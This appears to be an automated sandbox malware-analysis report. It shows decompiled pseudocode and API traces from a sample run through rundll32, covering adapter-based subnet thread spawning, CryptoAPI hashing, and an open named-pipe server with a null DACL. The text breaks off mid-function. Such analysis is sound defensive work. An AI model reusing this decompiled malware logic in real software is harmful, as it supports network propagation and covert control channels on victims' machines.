                                                                                                                                                              • Instruction ID: 7c8b8fe5a5806a4a7b544ba91886c63cdb17d7b302541e8a43f706571d06ac92
                                                                                                                                                              • Opcode Fuzzy Hash: ca516239176d37885ab1e6ece90b5844561c09da4b46744f1edfb35465a1967b
                                                                                                                                                              • Instruction Fuzzy Hash: F79159B1608355AFE720DF65D988E9BB7E8FF84309F04292EF248C2151E775EA448F52
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 144 4e28b2e-4e28b94 call 4e2a760 memset * 2 GetAdaptersInfo 147 4e28b9a-4e28bae LocalAlloc 144->147 148 4e28d2e-4e28d36 144->148 147->148 149 4e28bb4-4e28bbe GetAdaptersInfo 147->149 150 4e28d24-4e28d28 LocalFree 149->150 151 4e28bc4-4e28bcc 149->151 150->148 152 4e28bd2-4e28c12 inet_addr * 2 call 4e2641a 151->152 153 4e28c77-4e28c7e call 4e27d4e 151->153 158 4e28c31-4e28c37 152->158 159 4e28c14-4e28c2b call 4e26b95 HeapFree 152->159 160 4e28c80-4e28c83 call 4e28d39 153->160 161 4e28c88-4e28c8c 153->161 165 4e28c69-4e28c71 158->165 166 4e28c39-4e28c4b call 4e2641a 158->166 159->158 160->161 163 4e28c8e 161->163 164 4e28d0d-4e28d11 161->164 168 4e28c94-4e28ca2 LocalAlloc 163->168 164->150 170 4e28d13-4e28d22 FindCloseChangeNotification 164->170 165->151 165->153 166->165 177 4e28c4d-4e28c63 call 4e26b95 HeapFree 166->177 172 4e28ca4-4e28cc3 inet_addr 168->172 173 4e28cff-4e28d0b 168->173 170->150 170->170 172->173 176 4e28cc5-4e28ccd 172->176 173->164 173->168 176->173 178 4e28ccf-4e28cf5 htonl * 2 CreateThread 176->178 177->165 178->173 180 4e28cf7-4e28cfb 178->180 180->173
                                                                                                                                                              C-Code - Quality: 67%
                                                                                                                                                              			E04E28B2E(intOrPtr* _a4, void* _a8, int _a16, void _a20, int _a4112, void _a4116) {
                                                                                                                                                              				int _v0;
                                                                                                                                                              				int _v4;
                                                                                                                                                              				signed int _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				void* _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				signed int _v32;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				void* _t69;
                                                                                                                                                              				void* _t73;
                                                                                                                                                              				void* _t75;
                                                                                                                                                              				signed int _t77;
                                                                                                                                                              				signed int _t80;
                                                                                                                                                              				void _t81;
                                                                                                                                                              				void* _t84;
                                                                                                                                                              				void* _t93;
                                                                                                                                                              				void* _t100;
                                                                                                                                                              				struct _SECURITY_ATTRIBUTES* _t101;
                                                                                                                                                              				signed int _t105;
                                                                                                                                                              				signed int _t108;
                                                                                                                                                              				signed int _t109;
                                                                                                                                                              				void* _t110;
                                                                                                                                                              				intOrPtr* _t112;
                                                                                                                                                              				intOrPtr* _t113;
                                                                                                                                                              				void* _t114;
                                                                                                                                                              				intOrPtr* _t115;
                                                                                                                                                              				void* _t117;
                                                                                                                                                              				signed int _t122;
                                                                                                                                                              				void* _t125;
                                                                                                                                                              
                                                                                                                                                              				E04E2A760(0x3014);
                                                                                                                                                              				_t101 = 0;
                                                                                                                                                              				_a16 = 0;
                                                                                                                                                              				memset( &_a20, 0, 0xffc);
                                                                                                                                                              				_a4112 = 0;
                                                                                                                                                              				memset( &_a4116, 0, 0x1ffc);
                                                                                                                                                              				_t115 = __imp__GetAdaptersInfo;
                                                                                                                                                              				_t125 = (_t122 & 0xfffffff8) + 0x18;
                                                                                                                                                              				_a8 = 0;
                                                                                                                                                              				_v4 = 0;
                                                                                                                                                              				_v0 = 0;
                                                                                                                                                              				_t69 =  *_t115(0,  &_a8, _t110, _t114, _t100); // executed
                                                                                                                                                              				if(_t69 != 0x6f) {
                                                                                                                                                              					L23:
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				_t112 = LocalAlloc(0x40, _v0);
                                                                                                                                                              				_a4 = _t112;
                                                                                                                                                              				if(_t112 == 0) {
                                                                                                                                                              					goto L23;
                                                                                                                                                              				}
                                                                                                                                                              				_t73 =  *_t115(_t112,  &_v0); // executed
                                                                                                                                                              				if(_t73 != 0) {
                                                                                                                                                              					L22:
                                                                                                                                                              					LocalFree(_v4);
                                                                                                                                                              					goto L23;
                                                                                                                                                              				}
                                                                                                                                                              				while(_v20 < 0x400) {
                                                                                                                                                              					if( *((intOrPtr*)(_t112 + 0x1a4)) != _t101) {
                                                                                                                                                              						_t28 = _t112 + 0x200; // 0x200
                                                                                                                                                              						_t93 = E04E2641A(_t28);
                                                                                                                                                              						_v24 = _t93;
                                                                                                                                                              						if(_t93 != _t101) {
                                                                                                                                                              							E04E26B95(_t93, 0, _a4);
                                                                                                                                                              							HeapFree(GetProcessHeap(), _t101, _v24);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_t112 =  *_t112;
                                                                                                                                                              					_v28 = _v28 + 1;
                                                                                                                                                              					if(_t112 != _t101) {
                                                                                                                                                              						continue;
                                                                                                                                                              					}
                                                                                                                                                              					break;
                                                                                                                                                              				}
                                                                                                                                                              				_t75 = E04E27D4E(_t103); // executed
                                                                                                                                                              				if(_t75 != 0) {
                                                                                                                                                              					E04E28D39(_a4);
                                                                                                                                                              				}
                                                                                                                                                              				if(_v20 <= _t101) {
                                                                                                                                                              					L20:
                                                                                                                                                              					if(_v16 <= _t101) {
                                                                                                                                                              						goto L22;
                                                                                                                                                              					} else {
                                                                                                                                                              						goto L21;
                                                                                                                                                              					}
                                                                                                                                                              					do {
                                                                                                                                                              						L21:
                                                                                                                                                              						FindCloseChangeNotification( *(_t125 + 0x20 + _t101 * 4)); // executed
                                                                                                                                                              						_t101 =  &(_t101->nLength);
                                                                                                                                                              					} while (_t101 < _v16);
                                                                                                                                                              					goto L22;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t113 = __imp__#14;
                                                                                                                                                              					do {
                                                                                                                                                              						_t77 = LocalAlloc(0x40, 0xc);
                                                                                                                                                              						_t117 = _t77;
                                                                                                                                                              						if(_t117 != _t101) {
                                                                                                                                                              							__imp__#11("255.255.255.255");
                                                                                                                                                              							_t108 = _v20;
                                                                                                                                                              							_t109 =  *(_t125 + 0x1024 + _t108 * 8);
                                                                                                                                                              							_t105 =  *(_t125 + 0x1020 + _t108 * 8) & _t109;
                                                                                                                                                              							if(_t105 != 0) {
                                                                                                                                                              								_t80 = _t77 ^ _t109 | _t105;
                                                                                                                                                              								_v16 = _t80;
                                                                                                                                                              								if(_t80 != 0) {
                                                                                                                                                              									_t81 =  *_t113(_t105);
                                                                                                                                                              									 *_t117 = _t81;
                                                                                                                                                              									 *((intOrPtr*)(_t117 + 4)) =  *_t113(_v20);
                                                                                                                                                              									 *((intOrPtr*)(_t117 + 8)) = _a4;
                                                                                                                                                              									_t84 = CreateThread(_t101, _t101, E04E28AB3, _t117, _t101, _t101); // executed
                                                                                                                                                              									if(_t84 != _t101) {
                                                                                                                                                              										 *(_t125 + 0x20 + _v32 * 4) = _t84;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_v16 = _v16 + 1;
                                                                                                                                                              					} while (_v16 < _v20);
                                                                                                                                                              					goto L20;
                                                                                                                                                              				}
                                                                                                                                                              			}
































                                                                                                                                                              0x04e28b39
                                                                                                                                                              0x04e28b41
                                                                                                                                                              0x04e28b4e
                                                                                                                                                              0x04e28b52
                                                                                                                                                              0x04e28b68
                                                                                                                                                              0x04e28b6f
                                                                                                                                                              0x04e28b74
                                                                                                                                                              0x04e28b7a
                                                                                                                                                              0x04e28b83
                                                                                                                                                              0x04e28b87
                                                                                                                                                              0x04e28b8b
                                                                                                                                                              0x04e28b8f
                                                                                                                                                              0x04e28b94
                                                                                                                                                              0x04e28d2e
                                                                                                                                                              0x04e28d36
                                                                                                                                                              0x04e28d36
                                                                                                                                                              0x04e28ba6
                                                                                                                                                              0x04e28ba8
                                                                                                                                                              0x04e28bae
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28bba
                                                                                                                                                              0x04e28bbe
                                                                                                                                                              0x04e28d24
                                                                                                                                                              0x04e28d28
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28d28
                                                                                                                                                              0x04e28bc4
                                                                                                                                                              0x04e28c37
                                                                                                                                                              0x04e28c39
                                                                                                                                                              0x04e28c40
                                                                                                                                                              0x04e28c45
                                                                                                                                                              0x04e28c4b
                                                                                                                                                              0x04e28c52
                                                                                                                                                              0x04e28c63
                                                                                                                                                              0x04e28c63
                                                                                                                                                              0x04e28c4b
                                                                                                                                                              0x04e28c69
                                                                                                                                                              0x04e28c6b
                                                                                                                                                              0x04e28c71
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28c71
                                                                                                                                                              0x04e28c77
                                                                                                                                                              0x04e28c7e
                                                                                                                                                              0x04e28c83
                                                                                                                                                              0x04e28c83
                                                                                                                                                              0x04e28c8c
                                                                                                                                                              0x04e28d0d
                                                                                                                                                              0x04e28d11
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28d13
                                                                                                                                                              0x04e28d13
                                                                                                                                                              0x04e28d17
                                                                                                                                                              0x04e28d1d
                                                                                                                                                              0x04e28d1e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28c8e
                                                                                                                                                              0x04e28c8e
                                                                                                                                                              0x04e28c94
                                                                                                                                                              0x04e28c98
                                                                                                                                                              0x04e28c9e
                                                                                                                                                              0x04e28ca2
                                                                                                                                                              0x04e28ca9
                                                                                                                                                              0x04e28caf
                                                                                                                                                              0x04e28cba
                                                                                                                                                              0x04e28cc1
                                                                                                                                                              0x04e28cc3
                                                                                                                                                              0x04e28cc7
                                                                                                                                                              0x04e28cc9
                                                                                                                                                              0x04e28ccd
                                                                                                                                                              0x04e28cd0
                                                                                                                                                              0x04e28cd6
                                                                                                                                                              0x04e28ce2
                                                                                                                                                              0x04e28cea
                                                                                                                                                              0x04e28ced
                                                                                                                                                              0x04e28cf5
                                                                                                                                                              0x04e28cfb
                                                                                                                                                              0x04e28cfb
                                                                                                                                                              0x04e28cf5
                                                                                                                                                              0x04e28ccd
                                                                                                                                                              0x04e28cc3
                                                                                                                                                              0x04e28cff
                                                                                                                                                              0x04e28d07
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28c94

                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 04E28B52
                                                                                                                                                              • memset.MSVCRT ref: 04E28B6F
                                                                                                                                                              • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 04E28B8F
                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 04E28BA0
                                                                                                                                                              • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 04E28BBA
                                                                                                                                                              • inet_addr.WS2_32(000001B0), ref: 04E28BDF
                                                                                                                                                              • inet_addr.WS2_32(000001C0), ref: 04E28BF3
                                                                                                                                                                • Part of subcall function 04E2641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,04E28E53,000000FF,00000000,00000000,00000000,00000000,77974AB0,?,04E28E53,00000000), ref: 04E26439
                                                                                                                                                                • Part of subcall function 04E2641A: GetProcessHeap.KERNEL32(00000000,00000000,?,04E28E53,00000000), ref: 04E26446
                                                                                                                                                                • Part of subcall function 04E2641A: HeapAlloc.KERNEL32(00000000,?,04E28E53,00000000), ref: 04E2644D
                                                                                                                                                                • Part of subcall function 04E2641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,04E28E53,000000FF,00000000,00000000,?,04E28E53,00000000), ref: 04E26465
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,000001B0), ref: 04E28C24
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E28C2B
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,00000200,000001B0), ref: 04E28C5C
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E28C63
                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,0000000C), ref: 04E28C98
                                                                                                                                                              • inet_addr.WS2_32(255.255.255.255), ref: 04E28CA9
                                                                                                                                                              • htonl.WS2_32(?), ref: 04E28CD0
                                                                                                                                                              • htonl.WS2_32(?), ref: 04E28CD8
                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,04E28AB3,00000000,00000000,00000000), ref: 04E28CED
                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 04E28D17
                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 04E28D28
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocFreeLocalProcessinet_addr$AdaptersByteCharInfoMultiWidehtonlmemset$ChangeCloseCreateFindNotificationThread
                                                                                                                                                              • String ID: Oet Uet0Xet$255.255.255.255
                                                                                                                                                              • API String ID: 569246953-1172651094
                                                                                                                                                              • Opcode ID: 35af82c134ae3ee7fb58a81ff2ac113e3ea877b614bfd55e2fb6b2951e03c785
                                                                                                                                                              • Instruction ID: 61a453e508128c3576dfcf433977831009f52a322fe2e91fb915b6c6621191e8
                                                                                                                                                              • Opcode Fuzzy Hash: 35af82c134ae3ee7fb58a81ff2ac113e3ea877b614bfd55e2fb6b2951e03c785
                                                                                                                                                              • Instruction Fuzzy Hash: 5A518EB1904316AFD720EF60DE84D6BBBE9FB88305F145A2EF68492100D735E808CF92
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 289 4e215a7-4e215eb GetProcessHeap HeapAlloc 290 4e215f1-4e2160b CryptAcquireContextW 289->290 291 4e2173d-4e21744 289->291 290->291 292 4e21611-4e2161b 290->292 293 4e21621-4e21622 292->293 294 4e216be-4e216d2 CryptCreateHash 292->294 297 4e21710 293->297 298 4e21628-4e2163c GetProcessHeap HeapAlloc 293->298 295 4e21712-4e21715 294->295 296 4e216d4 294->296 300 4e21720-4e21723 295->300 301 4e21717-4e2171a CryptDestroyHash 295->301 299 4e216d8-4e216dc 296->299 297->295 298->297 302 4e21642-4e21676 CryptImportKey 298->302 299->295 307 4e216de-4e216f0 CryptHashData 299->307 303 4e21725-4e21728 CryptDestroyKey 300->303 304 4e2172e-4e21731 300->304 301->300 305 4e216aa-4e216bc HeapFree 302->305 306 4e21678-4e21690 CryptCreateHash 302->306 303->304 304->291 309 4e21733-4e21737 CryptReleaseContext 304->309 305->299 306->305 308 4e21692-4e216a4 CryptSetHashParam 306->308 307->295 310 4e216f2-4e21709 CryptGetHashParam 307->310 308->305 311 4e216a6 308->311 309->291 310->295 313 4e2170b-4e2170e 310->313 311->305 313->295
                                                                                                                                                              C-Code - Quality: 21%
                                                                                                                                                              			E04E215A7(intOrPtr _a4, intOrPtr _a8, void* _a12, void** _a16, intOrPtr _a20) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				long* _v12;
                                                                                                                                                              				signed int _v16;
                                                                                                                                                              				long* _v20;
                                                                                                                                                              				long _v24;
                                                                                                                                                              				char _v44;
                                                                                                                                                              				void* _t45;
                                                                                                                                                              				long** _t47;
                                                                                                                                                              				int _t48;
                                                                                                                                                              				void** _t52;
                                                                                                                                                              				int _t56;
                                                                                                                                                              				char* _t58;
                                                                                                                                                              				char* _t59;
                                                                                                                                                              				void* _t61;
                                                                                                                                                              				void* _t64;
                                                                                                                                                              				long _t70;
                                                                                                                                                              				int _t71;
                                                                                                                                                              
                                                                                                                                                              				_v12 = 0;
                                                                                                                                                              				_v20 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				_t70 = 0x10;
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				_v24 = _t70;
                                                                                                                                                              				_v16 = 0xbadf00d;
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				_t45 = HeapAlloc(GetProcessHeap(), 8, _t70);
                                                                                                                                                              				 *_a16 = _t45;
                                                                                                                                                              				if(_t45 == 0) {
                                                                                                                                                              					L23:
                                                                                                                                                              					return _v16;
                                                                                                                                                              				}
                                                                                                                                                              				_t47 =  &_v12;
                                                                                                                                                              				__imp__CryptAcquireContextW(_t47, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000008); // executed
                                                                                                                                                              				if(_t47 == 0) {
                                                                                                                                                              					goto L23;
                                                                                                                                                              				}
                                                                                                                                                              				_t48 = 0x8002;
                                                                                                                                                              				_t64 = _a20 - 0x8002;
                                                                                                                                                              				if(_t64 == 0) {
                                                                                                                                                              					_t71 = 0;
                                                                                                                                                              					__imp__CryptCreateHash(_v12, 0x8002, 0, 0,  &_v8); // executed
                                                                                                                                                              					if(0x8002 == 0) {
                                                                                                                                                              						L17:
                                                                                                                                                              						if(_v8 != _t71) {
                                                                                                                                                              							__imp__CryptDestroyHash(_v8);
                                                                                                                                                              						}
                                                                                                                                                              						if(_v20 != _t71) {
                                                                                                                                                              							CryptDestroyKey(_v20);
                                                                                                                                                              						}
                                                                                                                                                              						if(_v12 != _t71) {
                                                                                                                                                              							CryptReleaseContext(_v12, _t71);
                                                                                                                                                              						}
                                                                                                                                                              						goto L23;
                                                                                                                                                              					}
                                                                                                                                                              					_v16 = _v16 | 0xffffffff;
                                                                                                                                                              					L12:
                                                                                                                                                              					if(_v16 == 0xffffffff) {
                                                                                                                                                              						__imp__CryptHashData(_v8, _a4, _a8, _t71);
                                                                                                                                                              						if(_t48 != 0) {
                                                                                                                                                              							_t52 = _a16;
                                                                                                                                                              							__imp__CryptGetHashParam(_v8, 2,  *_t52,  &_v24, _t71);
                                                                                                                                                              							if(_t52 != 0) {
                                                                                                                                                              								_v16 = _t71;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					goto L17;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t64 != 1) {
                                                                                                                                                              					L16:
                                                                                                                                                              					_t71 = 0;
                                                                                                                                                              					goto L17;
                                                                                                                                                              				}
                                                                                                                                                              				_v44 = 0x8003;
                                                                                                                                                              				_t61 = HeapAlloc(GetProcessHeap(), 8, 0x20);
                                                                                                                                                              				if(_t61 == 0) {
                                                                                                                                                              					goto L16;
                                                                                                                                                              				}
                                                                                                                                                              				 *(_t61 + 8) = _t70;
                                                                                                                                                              				 *_t61 = 0x208;
                                                                                                                                                              				 *((intOrPtr*)(_t61 + 4)) = 0x6602;
                                                                                                                                                              				asm("movsd");
                                                                                                                                                              				asm("movsd");
                                                                                                                                                              				asm("movsd");
                                                                                                                                                              				asm("movsd");
                                                                                                                                                              				_t56 = CryptImportKey(_v12, _t61, 0x20, 0, 0x100,  &_v20); // executed
                                                                                                                                                              				if(_t56 != 0) {
                                                                                                                                                              					_t58 =  &_v8;
                                                                                                                                                              					__imp__CryptCreateHash(_v12, 0x8009, _v20, 0, _t58);
                                                                                                                                                              					if(_t58 != 0) {
                                                                                                                                                              						_t59 =  &_v44;
                                                                                                                                                              						__imp__CryptSetHashParam(_v8, 5, _t59, 0); // executed
                                                                                                                                                              						if(_t59 != 0) {
                                                                                                                                                              							_v16 = _v16 | 0xffffffff;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t48 = HeapFree(GetProcessHeap(), 8, _t61);
                                                                                                                                                              				_t71 = 0;
                                                                                                                                                              				goto L12;
                                                                                                                                                              			}




















                                                                                                                                                              0x04e215b8
                                                                                                                                                              0x04e215bb
                                                                                                                                                              0x04e215be
                                                                                                                                                              0x04e215c4
                                                                                                                                                              0x04e215c5
                                                                                                                                                              0x04e215c8
                                                                                                                                                              0x04e215c9
                                                                                                                                                              0x04e215ca
                                                                                                                                                              0x04e215ce
                                                                                                                                                              0x04e215d1
                                                                                                                                                              0x04e215d8
                                                                                                                                                              0x04e215e2
                                                                                                                                                              0x04e215e7
                                                                                                                                                              0x04e215eb
                                                                                                                                                              0x04e2173d
                                                                                                                                                              0x04e21744
                                                                                                                                                              0x04e21744
                                                                                                                                                              0x04e215ff
                                                                                                                                                              0x04e21603
                                                                                                                                                              0x04e2160b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e21614
                                                                                                                                                              0x04e21619
                                                                                                                                                              0x04e2161b
                                                                                                                                                              0x04e216c2
                                                                                                                                                              0x04e216ca
                                                                                                                                                              0x04e216d2
                                                                                                                                                              0x04e21712
                                                                                                                                                              0x04e21715
                                                                                                                                                              0x04e2171a
                                                                                                                                                              0x04e2171a
                                                                                                                                                              0x04e21723
                                                                                                                                                              0x04e21728
                                                                                                                                                              0x04e21728
                                                                                                                                                              0x04e21731
                                                                                                                                                              0x04e21737
                                                                                                                                                              0x04e21737
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e21731
                                                                                                                                                              0x04e216d4
                                                                                                                                                              0x04e216d8
                                                                                                                                                              0x04e216dc
                                                                                                                                                              0x04e216e8
                                                                                                                                                              0x04e216f0
                                                                                                                                                              0x04e216f7
                                                                                                                                                              0x04e21701
                                                                                                                                                              0x04e21709
                                                                                                                                                              0x04e2170b
                                                                                                                                                              0x04e2170b
                                                                                                                                                              0x04e21709
                                                                                                                                                              0x04e216f0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e216dc
                                                                                                                                                              0x04e21622
                                                                                                                                                              0x04e21710
                                                                                                                                                              0x04e21710
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e21710
                                                                                                                                                              0x04e2162c
                                                                                                                                                              0x04e21638
                                                                                                                                                              0x04e2163c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e21642
                                                                                                                                                              0x04e21648
                                                                                                                                                              0x04e2164e
                                                                                                                                                              0x04e21658
                                                                                                                                                              0x04e21659
                                                                                                                                                              0x04e2165a
                                                                                                                                                              0x04e21664
                                                                                                                                                              0x04e2166e
                                                                                                                                                              0x04e21676
                                                                                                                                                              0x04e21678
                                                                                                                                                              0x04e21688
                                                                                                                                                              0x04e21690
                                                                                                                                                              0x04e21693
                                                                                                                                                              0x04e2169c
                                                                                                                                                              0x04e216a4
                                                                                                                                                              0x04e216a6
                                                                                                                                                              0x04e216a6
                                                                                                                                                              0x04e216a4
                                                                                                                                                              0x04e21690
                                                                                                                                                              0x04e216b4
                                                                                                                                                              0x04e216ba
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000010,77D74620,?,74654F20), ref: 04E215D9
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E215E2
                                                                                                                                                              • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000008), ref: 04E21603
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020), ref: 04E21633
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E21636
                                                                                                                                                              • CryptImportKey.ADVAPI32(?,00000000,00000020,00000000,00000100,?), ref: 04E2166E
                                                                                                                                                              • CryptCreateHash.ADVAPI32(?,00008009,?,00000000,?), ref: 04E21688
                                                                                                                                                              • CryptSetHashParam.ADVAPI32(?,00000005,00008003,00000000), ref: 04E2169C
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04E216AD
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E216B4
                                                                                                                                                              • CryptCreateHash.ADVAPI32(?,00008002,00000000,00000000,?), ref: 04E216CA
                                                                                                                                                              • CryptHashData.ADVAPI32(?,?,000000FF,00000000), ref: 04E216E8
                                                                                                                                                              • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 04E21701
                                                                                                                                                              • CryptDestroyHash.ADVAPI32(?), ref: 04E2171A
                                                                                                                                                              • CryptDestroyKey.ADVAPI32(?), ref: 04E21728
                                                                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04E21737
                                                                                                                                                              Strings
                                                                                                                                                              • Oet Uet0Xet, xrefs: 04E216AD
                                                                                                                                                              • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04E215F8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Crypt$HashHeap$Process$AllocContextCreateDestroyParam$AcquireDataFreeImportRelease
                                                                                                                                                              • String ID: Oet Uet0Xet$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                              • API String ID: 2620112963-258184132
                                                                                                                                                              • Opcode ID: f24b92c26f6694bf13d075a74c2e9f26bf9ff4ccb42bb89ff69ef9411b4347ae
                                                                                                                                                              • Instruction ID: 34788cdbb80b074cc87f0dde5b4e2cff49ccd4525f3e01ee068b7aa98e381d87
                                                                                                                                                              • Opcode Fuzzy Hash: f24b92c26f6694bf13d075a74c2e9f26bf9ff4ccb42bb89ff69ef9411b4347ae
                                                                                                                                                              • Instruction Fuzzy Hash: C8518C71A00229BBEB208FA6DE48EAEFB79FF49751F144024F601E6094D7719A01CB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                              			E04E26FFE(WCHAR* _a4) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				long _v12;
                                                                                                                                                              				long _v16;
                                                                                                                                                              				struct _SECURITY_ATTRIBUTES _v28;
                                                                                                                                                              				struct _SECURITY_DESCRIPTOR* _t25;
                                                                                                                                                              				void* _t30;
                                                                                                                                                              				int _t31;
                                                                                                                                                              				int _t34;
                                                                                                                                                              				WCHAR* _t44;
                                                                                                                                                              				void* _t50;
                                                                                                                                                              				void* _t51;
                                                                                                                                                              
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				_v28.nLength = 0xc;
                                                                                                                                                              				_v28.bInheritHandle = 0;
                                                                                                                                                              				_t25 = HeapAlloc(GetProcessHeap(), 8, 0x14);
                                                                                                                                                              				_v28.lpSecurityDescriptor = _t25;
                                                                                                                                                              				if(_t25 == 0 || InitializeSecurityDescriptor(_t25, 1) == 0 || SetSecurityDescriptorDacl(_v28.lpSecurityDescriptor, 1, 0, 0) == 0) {
                                                                                                                                                              					return 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					while(1) {
                                                                                                                                                              						L3:
                                                                                                                                                              						_t30 = CreateNamedPipeW(_a4, 3, 6, 1, 0, 0, 0,  &_v28); // executed
                                                                                                                                                              						_v8 = _t30;
                                                                                                                                                              						if(_t30 == 0xffffffff) {
                                                                                                                                                              							continue;
                                                                                                                                                              						}
                                                                                                                                                              						L4:
                                                                                                                                                              						_t31 = ConnectNamedPipe(_t30, 0); // executed
                                                                                                                                                              						if(_t31 == 0) {
                                                                                                                                                              							L18:
                                                                                                                                                              							CloseHandle(_v8);
                                                                                                                                                              							do {
                                                                                                                                                              								goto L3;
                                                                                                                                                              							} while (_t30 == 0xffffffff);
                                                                                                                                                              							goto L4;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t50 = 0x1e;
                                                                                                                                                              							do {
                                                                                                                                                              								_t50 = _t50 - 1;
                                                                                                                                                              								_v12 = 0;
                                                                                                                                                              								_t34 = PeekNamedPipe(_v8, 0, 0, 0,  &_v12, 0); // executed
                                                                                                                                                              								if(_t34 == 0) {
                                                                                                                                                              									goto L9;
                                                                                                                                                              								}
                                                                                                                                                              								if(_v12 != 0) {
                                                                                                                                                              									_t51 = HeapAlloc(GetProcessHeap(), 8, _v12);
